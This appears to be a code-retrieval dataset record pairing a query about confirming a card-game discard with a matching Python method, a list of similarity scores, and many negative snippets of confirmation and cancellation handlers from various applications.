[ "0.6779038", "0.64504594", "0.6393454", "0.6248788", "0.6065166", "0.60555077", "0.60298246", "0.6014514", "0.6014514", "0.5978343", "0.5904059", "0.5888115", "0.5883593", "0.5855397", "0.58428776", "0.584109", "0.5830821", "0.582095", "0.5810005", "0.5807255", "0.5788884", "0.57709986", "0.574667", "0.5738221", "0.5737967", "0.57058537", "0.5680407", "0.56735003", "0.5642896", "0.56291485", "0.562021", "0.5614011", "0.5595327", "0.5593024", "0.556809", "0.55641556", "0.55591893", "0.5558305", "0.5548686", "0.55382204", "0.5533083", "0.55326396", "0.5528881", "0.5528702", "0.55202246", "0.5513971", "0.55041254", "0.5503086", "0.55018395", "0.5488135", "0.54830146", "0.54814434", "0.54784435", "0.5475379", "0.5463058", "0.544991", "0.54472756", "0.544597", "0.54333675", "0.5411004", "0.54085934", "0.5400689", "0.54006267", "0.53977484", "0.5396665", "0.539553", "0.5387312", "0.53800654", "0.5378856", "0.537282", "0.53693086", "0.53602904", "0.53573686", "0.5354459", "0.5354429", "0.5347059", "0.53427076", "0.5342567", "0.53405184", "0.53245234", "0.53223515", "0.5321809", "0.5314615", "0.5301498", "0.52926624", "0.52908504", "0.5289689", "0.5285544", "0.528017", "0.52695525", "0.526711", "0.5264777", "0.52642614", "0.52633953", "0.52546424", "0.52470315", "0.5243854", "0.52418876", "0.52303237", "0.52292776" ]
0.5896568
11
Confirm a user is sure about a discard and then perform it once confirmed.
def discardConfirmation(self, confirmed, wrapped_discards): discards = [] for element in wrapped_discards: discards.append(element.card) if self.discards != discards: confirmed = False self.discards = discards if not confirmed: self.controller.note = "Please confirm - discard " + "{0}".format(self.discards) return True # ask for confirmation else: # confirmed is True, performing discard and removing discarded wrapped cards from hand_info. if self.discard_confirm: controller_response = self.controller.discard(self.discards) if controller_response: for element in wrapped_discards: self.hand_info.remove(element) return False # now that this is done, we don't have anything waiting on confirmation
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def confirm_with_abort() -> None:\n\n click.confirm(\n \"Are you sure you want to drop the users table?\",\n abort=True\n )\n\n click.echo(\"We have gotten to this point, so the user has confirmed.\")", "def action_confirm(self):\n self.check_txt_ids()\n self.write({'state': 'confirmed'})\n return True", "async def confirm(ctx, *args: discord.Member):\n await _confirm(args)", "def confirm(self):\n self.automatically_detected=False\n self.save()", "def unconfirm(self):\n self.automatically_detected=True\n self.save()", "def confirm(dt):\n\n database_api.signOut(Cache.get(\"info\",\n \"token\"\n ),\n Cache.get(\"info\",\n \"nick\"\n )\n )\n\n if platform.system() == \"Linux\":\n os.system(\"sh func/sh/restore.sh\")\n\n App.get_running_app().stop()", "def confirm(self):\n with self.handle_alert(confirm=True):\n self.q(css='button#confirm').first.click()", "def confirm_action(message):\n if not click.confirm(message + \" Continue?\"):\n logger.info(\"User cancels action. Exiting...\")\n exit(0)\n else: return", "def confirm_as_variable() -> None:\n\n confirmed = click.confirm(\"Are you sure you want to drop the users table?\")\n status = click.style(\"yes\", fg=\"green\") if confirmed else click.style(\"no\", fg=\"red\")\n click.echo(\"Drop table confirmed?: \" + status)", "def action_confirm(self):\n options=self.env['plm.config.settings'].GetOptions()\n status = 'confirmed'\n action = 'confirm'\n default = {\n 'state': status,\n 'engineering_writable': False,\n }\n doc_default = {\n 'state': status,\n 'writable': False,\n }\n operationParams = {\n 'status': status,\n 'statusName': _('Confirmed'),\n 'action': action,\n 'docaction': 'confirm',\n 'excludeStatuses': ['confirmed', 'transmitted', 'released', 'undermodify', 'obsoleted'],\n 'includeStatuses': ['draft'],\n 'default': default,\n 'doc_default': doc_default,\n }\n if options.get('opt_showWFanalysis', False):\n return self.action_check_workflow(operationParams)\n else:\n ids=self._ids\n self.logging_workflow(ids, action, status)\n return self._action_to_perform(ids, operationParams, default)", "def confirm(self, message):\n raise NotImplementedError", "def confirm_removal(confirm, filename):\n if confirm == 'y' or confirm == 'yes':\n remove_file(filename)\n elif confirm == 'n' or confirm == 'no':\n print(\"File will stay there\")\n else:\n print(\"Please etner a valid answer (y/n, yes/no)\")\n confirm_removal()", "def cancel(self):\n with self.handle_alert(confirm=False):\n self.q(css='button#confirm').first.click()", "def confirm():\n\t\traise NotImplementedError", "def confirmed(self):", "def confirm_delete(self):\n self.language = LANGUAGE.get(self.lang)\n message = Message(self.language[\"del_user\"], self.language[\"del_info\"])\n delete_message = message.create_question_message(self.language[\"yes\"])\n response = delete_message.exec()\n\n if response == QMessageBox.Yes:\n self.delete_user()\n elif response == QMessageBox.No:\n delete_message.close()", "def confirm():\n if request.method == 'POST':\n user_type = session.get('type', None)\n if user_type == 'Admin':\n return redirect('/index')\n elif user_type == 'Client':\n return redirect('/clients/' + session.get('name'))\n else:\n return redirect('/')\n\n confirmed = request.values['confirmed']\n \n return render_template('confirm.html', confirmed=confirmed)", "def test_confirm_user(self):\n user = User(email=\"test@email.com\", password=\"testpassword\")\n\n self.assertFalse(user.confirmed)\n self.assertIsNone(user.confirmed_at)\n 
self.assertIsNotNone(user.confirmation_token)\n\n user.confirm()\n\n self.assertTrue(user.confirmed)\n self.assertIsNotNone(user.confirmed_at)\n self.assertIsNone(user.confirmation_token)", "def confirm_so(self, cr, uid, ids,context=None):\n return self.write(cr, uid, ids, {'state':'confirm_so'}, context=context)", "def prompt_discard(self, num_discards: int, state: 'State'):\n # TODO: Refactor to allow for flexible discarding (see Cellar). Meybe a force discard and a prompt discard?\n while self.hand and num_discards > 0:\n sorted_hand = sorted(list(self.hand), key=card_sort)\n card_name = self.get_input(\n f'Discard {num_discards} cards'\n f'Hand: {sorted_hand}',\n sorted_hand,\n state\n )\n # If the prompted card is in hand, discard it\n card = next((card for card in self.hand if card.name == card_name), None)\n if card:\n self.hand[card] -= 1\n self.hand += Counter() # Remove 0 and negative counts\n self.discard_pile.append(card)\n num_discards -= 1\n print(f'Discarded {card.name}')\n else:\n print(f'{card.name} is not in hand')", "def __onConfirmNo(self):\n self.__confDlg.reject()", "def cancel_dummy(self):\n if self.state != 'authorized':\n self.raise_user_error('cancel_only_authorized')\n else:\n self.state = 'cancel'\n self.save()", "def confirm(secret_id='', game=None):\n player = get_player(current_app, request, secret_id)\n if player.is_confirmed:\n flash(_('Your name is already confirmed as %(n)s', n=player.name),\n 'error')\n return redirect(url_for('player.player',\n secret_id=player.secret_id,\n _method='GET'))\n if game.state != game.State.CONFIRMING:\n return render_template('player/too-late.html',\n player_name=player.name)\n if request.method == 'POST':\n player.confirm(request.form.get('player_name', ''))\n session[USER_COOKIE] = player.cookie\n return redirect(url_for('player.player',\n secret_id=player.secret_id,\n _method='GET'))\n else: # request.method == 'GET'\n return render_template('player/confirm.html',\n unconfirmed_name=player.name,\n secret_id=secret_id)", "def confirm(self, task, log):\n self._tasks_in_process.remove(task)\n log.confirm(self._name, task.get_name(), task.get_payment())", "def _handle_consent_confirmation(user, is_confirmed):\n if is_confirmed == \"yes\":\n # user has already given consent, continue flow\n response = server.create_authorization_response(grant_user=user)\n else:\n # user did not give consent\n response = server.create_authorization_response(grant_user=None)\n return response", "def confirm(userid, choice, popupid):\r\n if choice:\r\n players[userid].resetSkills()", "def Confirm(self):\r\n \r\n global references\r\n self.from_ed = self.ed_result.get(\"1.0\",'end-1c')\r\n references.append(self.from_ed)\r\n self.confirm_b.configure(state = 'disabled')\r\n self.discard_b.configure(state = 'disabled')\r\n self.finalresult.configure(state = 'normal')\r\n self.finalresult.delete('1.0', END)\r\n \r\n self.final()", "def no_going_back(confirmation):\r\n if not confirmation:\r\n confirmation = 'yes'\r\n\r\n return valid_response(\r\n 'This action cannot be undone! 
'\r\n 'Type \"%s\" or press Enter to abort: ' % confirmation,\r\n str(confirmation))", "def confirm(text, window=None):\n return message(text, u'Confirma', M_QUESTION, B_YES_NO, window) == R_YES", "def confirm(self, token):\n ser = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = ser.loads(token.encode('utf-8'))\n except (BadSignature, SignatureExpired):\n return False\n if data.get('confirm') != self.id:\n return False\n self.confirmed = True\n db.session.add(self)\n return True", "def admin_reject(user):\n if user.comments in (None or \"\"):\n return\n\n subject = \"ECE/CIS Account - Account Application rejected for %s\" % user.username\n application = \"https://www.eecis.udel.edu/NewAccount/\"\n helprequest = \"https://www.eecis.udel.edu/service\"\n sponsor = \"%s@eecis.udel.edu\" % user.sponsor\n \n message = \"Your ECE/CIS Account has been rejected by ECE/CIS faculty adminstrators.\\n\" % user.sponsor\n message += \"The reason given for rejection was:\\n\\n%s\\n\\n\" % user.comments\n message += \"You may re-apply with corrected information at %s\\n\" % application\n message += \"Please don't reply to this email. If have any questions, please \\n\"\n message += \"please post a ticket as an outsider at %s\" % helprequest\n message += \"-- ECE\\CIS Labstaff\"\n\n\n send('account@eecis.udel.edu', 'ECE/CIS Account System', \\\n [user.email, sponsor], subject, message, MAILHOST)", "def action_confirm(self):\n # context = self._context or {}\n inv_obj = self.env['account.invoice']\n\n brw = self.browse(self.ids[0])\n line_ids = brw.line_ids\n if not line_ids:\n raise exceptions.except_orm(\n _('Invalid Procedure!'), _(\"No retention lines\"))\n\n res = [True]\n res += [False for i in line_ids\n if (i.wh_amount <= 0.0 or\n i.base_amount <= 0.0 or\n i.wh_src_rate <= 0.0)]\n if not all(res):\n raise exceptions.except_orm(\n _('Invalid Procedure!'),\n _(\"Verify retention lines do not have Null values(0.00)\"))\n\n res = 0.0\n for i in line_ids:\n res += i.wh_amount\n if abs(res - brw.wh_amount) > 0.0001:\n raise exceptions.except_orm(\n _('Invalid Procedure!'),\n _(\"Check the amount of withholdings\"))\n\n inv_ids = [i.invoice_id.id for i in brw.line_ids]\n if inv_ids:\n inv_obj.write({'wh_src_id': self.ids[0]})\n\n return self.write({'state': 'confirmed'})", "async def _global(self, ctx, confirmation: bool = False):\r\n global_bank = await bank.is_global()\r\n if global_bank is False:\r\n return await ctx.send(_(\"This command cannot be used with a local bank.\"))\r\n\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete all bank accounts for users \"\r\n \"who no longer share a server with the bot.\"\r\n \"\\nIf you're sure, type `{prefix}bank prune global yes`\"\r\n ).format(prefix=ctx.clean_prefix)\r\n )\r\n else:\r\n await bank.bank_prune(self.bot)\r\n await ctx.send(\r\n _(\r\n \"Bank accounts for users who \"\r\n \"no longer share a server with the bot have been pruned.\"\r\n )\r\n )", "async def _local(self, ctx, confirmation: bool = False):\r\n global_bank = await bank.is_global()\r\n if global_bank is True:\r\n return await ctx.send(_(\"This command cannot be used with a global bank.\"))\r\n\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete all bank accounts for users no longer in this server.\"\r\n \"\\nIf you're sure, type \"\r\n \"`{prefix}bank prune local yes`\"\r\n ).format(prefix=ctx.clean_prefix)\r\n )\r\n else:\r\n await bank.bank_prune(self.bot, guild=ctx.guild)\r\n await ctx.send(\r\n _(\"Bank accounts for 
users no longer in this server have been deleted.\")\r\n )", "def confirmation_failed(self):", "def confirm_further(self, update, context):\n response_code = update.callback_query[\"data\"] # wouldyou_{yes|no}\n request_id = context.user_data[\"current_request\"]\n log.info(\"No further comments req:%s %s\", request_id, response_code)\n self.finalize_request(update, context, request_id)", "def confirm(force):\n if not force:\n ans = input(que(bold(\"Are you sure? [y/N]: \")))\n else:\n ans = 'y'\n\n return ans.lower()", "def _confirm_action(self, action):\n\t\treturn True", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def confirm_wouldyou(self, update, context):\n chat_id = update.effective_chat.id\n response_code = update.callback_query[\"data\"] # wouldyou_{yes|no}\n request_id = context.user_data[\"current_request\"]\n log.info(\"Wouldyou req:%s %s\", request_id, response_code)\n\n if response_code == \"wouldyou_yes\":\n # they want to keep returning to this beneficiary\n context.bot_data[request_id][\"would_return\"] = True\n else:\n context.bot_data[request_id][\"would_return\"] = False\n\n # Send the next question, asking if they have any special comments for future volunteers\n self.updater.bot.send_message(\n chat_id=chat_id,\n text=c.MSG_FEEDBACK_FURTHER_COMMENTS % context.bot_data[request_id][\"beneficiary\"],\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(k.further_comments_choices),\n )\n context.user_data[\"state\"] = c.State.EXPECTING_FURTHER_COMMENTS", "def accept_cancel(self):\n self.ok = False\n self.destroy()", "def profileupdaterequest_discard(request, request_id):\n profileupdate = get_object_or_404(ProfileUpdateRequest, active=True,\n pk=request_id)\n profileupdate.active = False\n profileupdate.save()\n\n messages.success(request,\n 'Profile update request was discarded successfully.')\n return redirect(reverse('all_profileupdaterequests'))", "def confirmed(self, cr, uid, ids, context=None): \n self.write(cr, uid, ids, {'state':'confirmed'})\n return True", "def confirm_action(config, msg=None, allow_auto=True):\n # type: (dict, str, bool) -> bool\n if allow_auto and config['_auto_confirm']:\n return True\n if msg is None:\n msg = 'action'\n while True:\n user = get_input('Confirm {} [y/n]: '.format(msg)).lower()\n if user in ('y', 'yes', 'n', 'no'):\n break\n if user in ('y', 'yes'):\n return True\n return False", "def confirm():\n if g.session.user.email_confirmed:\n return redirect(url_for('index.index'))\n\n token = request.args.get('token')\n if token:\n try:\n user: User = db.session.query(User) \\\n .filter(User.confirmation_token == token).one()\n\n user.email_confirmed = True\n user.confirmation_token = None\n db.session.merge(user)\n db.session.commit()\n\n return render_template('sites/auth/confirm.html',\n title=gettext('Confirm Email'),\n sent=False, success=True), 200\n except NoResultFound:\n return render_template('sites/auth/confirm.html',\n title=gettext('Confirm Email'),\n sent=False, success=False), 401\n else:\n return render_template('sites/auth/confirm.html',\n title=gettext('Confirm Email'), sent=True), 200", "async def async_step_confirm(self, user_input=None):\n errors = {}\n if user_input is not None:\n return await self.async_step_one(user_input=None)\n return self.async_show_form(step_id=\"confirm\", errors=errors)", 
"def test_manually_confirm(self):\n data = {}\n response = self.client.post(self.url, data)\n self.assertRedirects(response, reverse('reminders_dashboard'))\n\n reminder = reminders.SentNotification.objects.get(pk=self.unconfirmed.pk)\n self.assertEqual(reminder.status, 'manual')\n self.assertEqual(reminder.date_confirmed.date(), datetime.date.today())", "def test_manually_confirm(self):\n data = {}\n response = self.client.post(self.url, data)\n self.assertRedirects(response, reverse('reminders_dashboard'))\n\n reminder = reminders.SentNotification.objects.get(pk=self.unconfirmed.pk)\n self.assertEqual(reminder.status, 'manual')\n self.assertEqual(reminder.date_confirmed.date(), datetime.date.today())", "def proceed():\n c_print(\"********** PROCEED? **********\")\n # capture user input\n confirm = input(\" \" * 36 + \"(y/n) \")\n # quit script if not confirmed\n if confirm.lower() != \"y\":\n c_print(\"******* EXITING SCRIPT *******\")\n print(\"~\" * 80)\n exit()\n else:\n c_print(\"********* PROCEEDING *********\")", "async def cancel(self, ctx):\n author: User = ctx.user_object\n\n if has_post_permission(ctx.guild.id, ctx.channel.id):\n try:\n task = adv.get_adventure(ctx.author.id)\n\n adventureid = task[0]\n if adventureid == '0':\n if author.has_item_by_item(REAPER_TOKEN):\n author.update_inventory(REAPER_TOKEN, remove=True)\n adv.remove(ctx.author.id)\n out = 'Slayer task cancelled!'\n else:\n out = 'Error: You do not have a reaper token.'\n elif adventureid == '1':\n adv.remove(ctx.author.id)\n out = 'Killing session cancelled!'\n elif adventureid == '2':\n adv.remove(ctx.author.id)\n out = 'Quest cancelled!'\n elif adventureid == '3':\n adv.remove(ctx.author.id)\n out = 'Gather cancelled!'\n elif adventureid == '4':\n adv.remove(ctx.author.id)\n out = 'Clue scroll cancelled!'\n elif adventureid == '5':\n adv.remove(ctx.author.id)\n out = 'Reaper task cancelled!'\n elif adventureid == '6':\n adv.remove(ctx.author.id)\n out = 'Runecrafting session cancelled!'\n else:\n out = f'Error: Invalid Adventure ID {adventureid}'\n\n except NameError:\n out = 'You are not currently doing anything.'\n await ctx.send(out)", "def button_confirm_bank(self):\n\n self.unlink_unconfirmed_lines()\n ret = super(AccountBankStatement, self).button_confirm_bank()\n return ret", "def confirm(msg: str = \"Do you want it:\", default: bool = True) -> bool:\n\n question = [\n {\n 'type': 'confirm',\n 'name': 'confirm',\n 'message': msg,\n 'default': default\n }\n ]\n try:\n answer = prompt(question)\n return answer['confirm']\n except KeyError:\n exit = confirm(msg=\"Do you want cancel script\")\n if exit:\n raise SystemExit\n else:\n return confirm(msg, default)", "async def user(\r\n self, ctx, member_or_id: Union[discord.Member, RawUserIds], confirmation: bool = False\r\n ):\r\n global_bank = await bank.is_global()\r\n if global_bank is False and ctx.guild is None:\r\n return await ctx.send(_(\"This command cannot be used in DMs with a local bank.\"))\r\n try:\r\n name = member_or_id.display_name\r\n uid = member_or_id.id\r\n except AttributeError:\r\n name = member_or_id\r\n uid = member_or_id\r\n\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete {name}'s bank account.\"\r\n \"\\nIf you're sure, type \"\r\n \"`{prefix}bank prune user {id} yes`\"\r\n ).format(prefix=ctx.clean_prefix, id=uid, name=name)\r\n )\r\n else:\r\n await bank.bank_prune(self.bot, guild=ctx.guild, user_id=uid)\r\n await ctx.send(_(\"The bank account for {name} has been pruned.\").format(name=name))", 
"def waiting_confirmation(self):", "def eventrequest_discard(request, request_id):\n eventrequest = get_object_or_404(EventRequest, active=True, pk=request_id)\n eventrequest.active = False\n eventrequest.save()\n\n messages.success(request,\n 'Workshop request was discarded successfully.')\n return redirect(reverse('all_eventrequests'))", "def test_reset_confirmation(self):\n self._create_program_and_course_enrollment(self.program_uuid, self.user)\n\n with self._replace_stdin('confirm'):\n call_command(self.command, self.program_uuid)\n\n self._validate_enrollments_count(0)", "def confirmBlock(self, activePlayer, opponentAction):\n # todo: raise notImplemented. should be overriden\n return None", "def notify_email_confirmed(self, user, email):\n \n # make sure user isn't still invited to groups he owns or is a member of\n for g in self.users_groups(user):\n g.remove_invitation(user)", "async def reset(self, ctx, confirmation: bool = False):\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete all bank accounts for {scope}.\\nIf you're sure, type \"\r\n \"`{prefix}bank reset yes`\"\r\n ).format(\r\n scope=self.bot.user.name if await bank.is_global() else _(\"this server\"),\r\n prefix=ctx.clean_prefix,\r\n )\r\n )\r\n else:\r\n await bank.wipe_bank(guild=ctx.guild)\r\n await ctx.send(\r\n _(\"All bank accounts for {scope} have been deleted.\").format(\r\n scope=self.bot.user.name if await bank.is_global() else _(\"this server\")\r\n )\r\n )", "def resetConfirm(self):\n\n ## Check if exposure is in progress\n if self.thread.isRunning():\n QtGui.QMessageBox.warning(self, \"Exposure warning.\", \"Exposure in progress, unable to close program.\", QtGui.QMessageBox.Ok)\n return\n\n else:\n reply = QtGui.QMessageBox.question(self, 'Confirmation','Are you sure you want to reset the STA3800 controller?',\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No)\n\n if reply == QtGui.QMessageBox.Yes:\n self.reset()", "def you_should_be_able_to_confirm_and_close(driver):\n wait_on_element(driver, 0.5, 30, '//h1[contains(.,\"Test Changes\")]')\n driver.find_element_by_xpath('//mat-checkbox[@ix-auto=\"checkbox__CONFIRM\"]').click()\n driver.find_element_by_xpath('//button[@ix-auto=\"button__TEST CHANGES\"]').click()\n wait_on_element_disappear(driver, 1, 30, '//h6[contains(.,\"Please wait\")]')", "def confirm_tend(self, before, after, tx):\n assert True", "def test_confirm_fail_consent_oauth_token(self):\n # First perform an add request that creates the flow request with status 'PENDING'\n res = self._add_flow_request()\n confirm_id = res.json()['confirm_id']\n process_id = res.json()['process_id']\n callback_url = 'http://127.0.0.1/'\n\n self.client.login(username='duck', password='duck')\n res = self.client.get('/v1/flow_requests/confirm/?confirm_id={}&callback_url={}&action=add'.format(\n confirm_id, callback_url))\n self.assertRedirects(res, \"{}?process_id={}&success=false&error={}\".format(callback_url, process_id, ERRORS_MESSAGE['INTERNAL_GATEWAY_ERROR']),\n fetch_redirect_response=False)", "def send_confirmation(self):\r\n c.user.email_validated = False\r\n c.user.confirmation_code = random_key(6)\r\n c.user._commit()\r\n emailer.confirmation_email(c.user)", "def handle_email_confirmed(sender, **kwargs):\n email = kwargs['email_address']\n email.user.userprofile.member.cast().confirm_email()", "def iscanceled(*args):", "def on_cancel(self):\n self.state = CANCELED\n self._reject()", "def _confirm(self, delay_factor=1):\n\n delay_factor = 
self.select_delay_factor(delay_factor)\n error_marker = \"Nothing to confirm in configuration\"\n command_string = \"confirm\"\n\n if self.check_config_mode():\n self.exit_config_mode()\n\n output = self.send_command(\n command_string=command_string, delay_factor=delay_factor\n )\n\n if error_marker in output:\n raise ValueError(\n \"Confirm failed with following errors:\\n\\n{}\".format(output)\n )\n return output", "def confirm_yes():\r\n confirm = raw_input(\"Enter 'yes' to confirm: \")\r\n if confirm == 'yes':\r\n return True\r\n return False", "def confirm(id):\n #: get resources\n user = User.query.get_or_404(id)\n service = SignUpService(user)\n input_token = request.args['token']\n\n #: active current account\n try:\n service.active(input_token)\n except TokenUsedError:\n message = _(u\"The account had been actived.\")\n return render_template(\"confirm-failed.html\", message=message), 403\n except TokenWrongError:\n message = _(u\"The active token is invalid.\")\n return render_template(\"confirm-failed.html\", message=message), 403\n\n #: automatic sign in\n session_login(user)\n #: output a success message\n message = _(u\"The account has been actived successfully.\")\n return render_template(\"confirm-success.html\", message=message)", "def confirm(msg: str) -> bool:\n res = input(msg + \" (Y/n) > \")\n if res == 'Y' or res == 'y' or res == 'yes' or res == 'Yes' or res == \"\":\n return True\n return False", "def test_yes_option_disabled(\n self, wait_tx_settled_mock, confirm_mock, do_transfer_mock\n ):\n password_option = self.get_password_args(self.PASSWORD)\n self.invoke(\n \"transfer\",\n self.LEDGER_ID,\n self.get_address(self.LEDGER_ID, self.PASSWORD),\n \"100000\",\n \"100\",\n *password_option,\n )\n confirm_mock.assert_called_once()", "def confirm(message: str = \"Confirm?\", suffix: str = \" (y/n) \") -> bool:\n session = create_confirm_session(message, suffix)\n return session.prompt()", "def confirmCall(self, activePlayer, action):\n # todo: raise notImplemented. should be overriden\n return False", "def confirm_email(self):\n # The base class' implementation does nothing\n pass", "def _confirm_prompt(message, prompt=\"\\nAre you sure? 
[y/yes (default: no)]: \",\n affirmations=(\"Y\", \"Yes\", \"yes\", \"y\")):\n answer = input(message + prompt)\n return answer in affirmations", "def confirm(self, prompt, default):\n raise NotImplementedError(NotImplementedMessage)", "def confirmation(self, question, answer):\n confirm_flag = False\n while confirm_flag not in ['y', 'n']:\n confirm_flag = raw_input(question + ' [y/n]: ')\n if confirm_flag == 'y':\n print answer\n elif confirm_flag == 'n':\n print 'The user cancel the operation'\n exit()\n else:\n print 'The entry is not valid, please enter y or n.'\n return True", "def confirm(self, prompt=None, resp=False):\n\n if prompt is None:\n prompt = 'Confirm'\n\n if resp:\n prompt = '%s [%s]|%s: ' % (prompt, 'y', 'n')\n else:\n prompt = '%s [%s]|%s: ' % (prompt, 'n', 'y')\n\n while True:\n ans = raw_input(prompt)\n if not ans:\n return resp\n if ans not in ['y', 'Y', 'n', 'N']:\n print 'please enter y or n.'\n continue\n if ans == 'y' or ans == 'Y':\n return True\n if ans == 'n' or ans == 'N':\n return False", "def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()", "def confirm(self, action):\n title = \"%s : P L E A S E C O N F I R M\" % action\n question_text = \"<html><b>%s - PLEASE CONFIRM.</b><br/>\"\\\n \"<br/>Do you want to %s %s recordings for the following project?\"\\\n \"<br/><br/>PROJECT : %s\"\\\n \"<br/>CLIENT : %s\"\\\n \"<br/>DATE : %s<br/></html>\" % (\n action.upper(),\n action,\n \" & \".join(self.selected_formats),\n self.recordings_table.project_details()[2],\n self.recordings_table.project_details()[3],\n self.recordings_table.project_details()[0]\n )\n\n self.hide()\n if action == 'upload':\n self.confirmation_dialog.setText(title, question_text)\n self.confirmation_dialog.exec_()\n self.show()\n\n if self.confirmation_dialog.cancelled:\n return (False, False)\n\n return (True, self.confirmation_dialog.immediate_upload)\n else:\n self.confirmation_dialog.showQuestion(title, question_text)\n self.show()\n return self.confirmation_dialog.copy_confirmed", "def test_canceled_unopposed(self):\n s1 = self.battle.create_skirmish(self.alice, 10) # Attack 10\n s1a = s1.react(self.bob, 8,\n troop_type=\"cavalry\") # --Attack 8 (12)\n s1a.react(self.alice, 6,\n troop_type=\"ranged\") # ----Attack 6 (9)\n s1.resolve()\n self.assertEqual(s1.victor, self.alice.team)\n self.assert_(s1.unopposed)\n\n # Should be 20 VP (double the 10 it'd ordinarily be worth)\n self.assertEqual(s1.vp, 20)", "def disassociate_accounts(request, id):\n election = get_object_or_404(Election, pk=id)\n success = False\n if request.POST and \"confirm\" in request.POST:\n election.disassociate_accounts()\n success = True\n return render_to_response(\"django_elect/disassociate.html\", {\n \"title\": \"Disassociate Accounts for Election %s\" % election,\n \"election\": election,\n \"success\": success,\n }, context_instance=RequestContext(request))", "async def confirm(self, msg, *args):\n if Controller.prev_regex is None:\n await msg.channel.send(**{\n 'content': 'No key change in progress',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n })\n return\n Controller.prev_regex = None\n Controller.prev_help = None\n await msg.channel.send(**{\n 'content': 'Key change confirmed',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n })", "def test_confirm_invalid_action(self):\n 
headers = self._get_oauth_header()\n # using delete but it doesn't matter if it's delete or add\n res = self.client.delete('/v1/flow_requests/p_11111/', **headers)\n confirm_id = res.json()['confirm_id']\n callback_url = 'http://127.0.0.1/'\n\n self.client.login(username='duck', password='duck')\n res = self.client.get('/v1/flow_requests/confirm/?confirm_id={}&callback_url={}&action=NOT_VALID'.format(\n confirm_id, callback_url))\n\n self.assertEqual(res.status_code, 400)\n self.assertEqual(res.content.decode('utf-8'), ERRORS_MESSAGE['UNKNOWN_ACTION'])", "def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()", "def confirm_email(self, request, email_address):\n email_address.verified = True\n email_address.set_as_primary(conditional=True)\n email_address.save()\n\n u = get_user_model().objects.get(pk=email_address.user.id)\n u.is_active = True\n u.save()", "def confirmed(self, cr, uid, ids, context=None):\n\tallow_archive_line_obj = self.pool.get('services.contracts.allowances.lines')\n for record in self.browse(cr, uid, ids, context=context):\n\t\tif not record.allowances_lines_before :\n \traise osv.except_osv(_('Partner Lines !'), _('Sorry no partner Lines!'))\n\n\t \tlines_ids = [line.id for line in record.allowances_lines_after]\n \tallow_archive_line_obj.unlink(cr,uid,lines_ids,context=context)\n\n\t\tfor lines in record.allowances_lines_before:\n\t\t\tif lines.percentage_rating < 0 or lines.percentage_rating > 100 :\n \t\traise osv.except_osv(_('Rate Error !'), _('Sorry you insert wrong rate ... rate is between (0,100)!'))\n \t\tamount_after_rate_id = allow_archive_line_obj.create(cr, uid, {\n \t\t\t\t'cost_of_rent':lines.cost_of_rent,\n \t\t\t\t'amount_untaxed':round (lines.amount_untaxed*lines.percentage_rating/100,2),\n \t\t\t\t'amount_tax':round(lines.amount_tax*lines.percentage_rating/100,2),\n \t\t\t\t'amount_total':round(lines.amount_total*lines.percentage_rating/100,2),\n \t\t\t\t'deduct_days':lines.deduct_days,\n \t\t\t\t'deduct_amount':lines.deduct_amount,\n \t\t\t\t'contract_id':lines.contract_id.id,\n\t\t\t\t\t'env_allow_id_after_rate':record.id,\n\t\t\t\t\t'type': 'after',\n 'category_id':lines.category_id.id,\n\t\t\t\t\t'percentage_rating':lines.percentage_rating,\n\n })\n\t\t\n \n self.write(cr, uid, ids, {'state':'confirmed'})\n return True", "async def remove(message, client, extra_args):\n\n if await funnypts_transaction(message, client, extra_args, \"remove\"):\n await message.channel.send(\"BRUH, THAT WAS CRINGE. SOMEONE JUST REVOKED YOUR FUNNYPOINT\")", "def alert_cancel(self):\n self._alert_accept_cancel(False)", "async def _delete_data(self, ctx: Context):\n\n if ctx.guild is not None:\n return await ctx.send(\"This command is available in DMs only.\")\n\n msg = await ctx.send(\n \"Are you sure you want to delete all your data? It will reset\"\n \" all your progress. **This action is irreversible.**\"\n )\n start_adding_reactions(msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n\n pred = ReactionPredicate.yes_or_no(msg, ctx.author)\n try:\n await ctx.bot.wait_for(\"reaction_add\", check=pred)\n except asyncio.TimeoutError:\n return await ctx.send(\"You took too long to react. 
Data deletion cancelled.\")\n\n if pred.result is True:\n await ctx.send(\n \"Please reply to this message by sending `CONFIRM`,\"\n \" without any formatting, to confirm data deletion.\"\n )\n\n inner_pred = MessagePredicate.same_context(ctx)\n\n try:\n await self.bot.wait_for(\"message\", check=inner_pred, timeout=30)\n except asyncio.TimeoutError:\n return await ctx.send(\"You took too long to respond. Data deletion cancelled.\")\n\n if inner_pred.content.strip() == \"CONFIRM\":\n await self.config.user(ctx.author).clear()\n else:\n return await ctx.send(\"Cancelled data deletion.\")\n\n else:\n return await ctx.send(\"Cancelled data deletion request.\")\n\n await ctx.send(\n \"Data deletion request successful. All data associated with your account\"\n \" will be deleted within 24 hours. Data is not recoverable anymore.\"\n )", "def confirm_dispatch(self, update, context):\n chat_id = update.effective_chat.id\n response_code = update.callback_query[\"data\"] # caution_ok or caution_cancel\n request_id = context.user_data[\"reviewed_request\"]\n log.info(\"Confirm req:%s %s\", request_id, response_code)\n\n request_details = 